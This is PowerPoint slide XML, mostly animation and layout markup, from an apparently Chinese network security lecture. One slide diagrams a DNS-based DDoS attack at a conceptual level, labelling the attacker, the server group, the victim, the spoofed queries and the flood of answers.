                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52234"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="522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52238"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52238"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="67" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="68" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="52240"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52240"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52240"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52240"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52240"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="522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2239"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52239"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="80" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="81" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="52241"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52241"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52241"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52241"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52241"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52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bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="52231" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="52232" grpId="0" animBg="1"/>
      <p:bldP spid="52233" grpId="0" animBg="1"/>
      <p:bldP spid="52234" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="52236" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="52237" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="52238" grpId="0" animBg="1"/>
      <p:bldP spid="52239" grpId="0" animBg="1"/>
      <p:bldP spid="52240" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="52241" grpId="0" bldLvl="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smtClean="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152579" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>域名服务协议安全威胁(Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5427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9150" y="35004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6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5724525" y="3644900"/>
            <a:ext cx="142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服务器组</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4278" name="TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="963613" y="4530725"/>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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>攻击者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="542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6100" y="50641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1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4256088" y="6021388"/>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zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>被攻击者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>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1.1.1.1</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pic>
        <p:nvPicPr>
          <p:cNvPr id="542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327275"/>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Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-1071412">
            <a:off x="1330325" y="2524125"/>
            <a:ext cx="4295775" cy="1017588"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3313215"/>
              <a:gd name="T1" fmla="*/ 104817056 h 455220"/>
              <a:gd name="T2" fmla="*/ 17706623 w 3313215"/>
              <a:gd name="T3" fmla="*/ 88267464 h 455220"/>
              <a:gd name="T4" fmla="*/ 34306541 w 3313215"/>
              <a:gd name="T5" fmla="*/ 634419797 h 455220"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 3313215"/>
              <a:gd name="T10" fmla="*/ 0 h 455220"/>
              <a:gd name="T11" fmla="*/ 3313215 w 3313215"/>
              <a:gd name="T12" fmla="*/ 455220 h 455220"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="3313215" h="455220">
                <a:moveTo>
                  <a:pt x="0" y="75210"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="578922" y="37605"/>
                  <a:pt x="1157845" y="0"/>
                  <a:pt x="1710047" y="63335"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2262250" y="126670"/>
                  <a:pt x="2787732" y="290945"/>
                  <a:pt x="3313215" y="45522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283" name="TextBox 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="2924175"/>
            <a:ext cx="3240088" cy="585788"/>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①www.example.org?ID=xxxx</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黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>发出大量查询，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>From IP=1.1.1.1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54284" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4948238" y="3444875"/>
            <a:ext cx="776287" cy="1497013"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 773676 w 776614"/>
              <a:gd name="T1" fmla="*/ 0 h 1741117"/>
              <a:gd name="T2" fmla="*/ 212136 w 776614"/>
              <a:gd name="T3" fmla="*/ 212293 h 1741117"/>
              <a:gd name="T4" fmla="*/ 0 w 776614"/>
              <a:gd name="T5" fmla="*/ 447101 h 1741117"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 776614"/>
              <a:gd name="T10" fmla="*/ 0 h 1741117"/>
              <a:gd name="T11" fmla="*/ 776614 w 776614"/>
              <a:gd name="T12" fmla="*/ 1741117 h 1741117"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="776614" h="1741117">
                <a:moveTo>
                  <a:pt x="776614" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="559496" y="268265"/>
                  <a:pt x="342378" y="536531"/>
                  <a:pt x="212942" y="826717"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83506" y="1116903"/>
                  <a:pt x="0" y="1741117"/>
                  <a:pt x="0" y="1741117"/>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4285" name="TextBox 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3492500" y="4149725"/>
            <a:ext cx="3240088" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="94D4EE"/>
              </a:gs>
              <a:gs pos="64999">
                <a:srgbClr val="C6ECFD"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="D6F4FF"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:beve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② www.example.org=1.2.3.4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zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>大量应答</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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281"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54281"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54281"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54281"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54279"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54279"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54279"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54279"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54276"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54276"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54276"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54276"/>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54277"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54277"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54277"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5427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4280"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54280"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54280"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
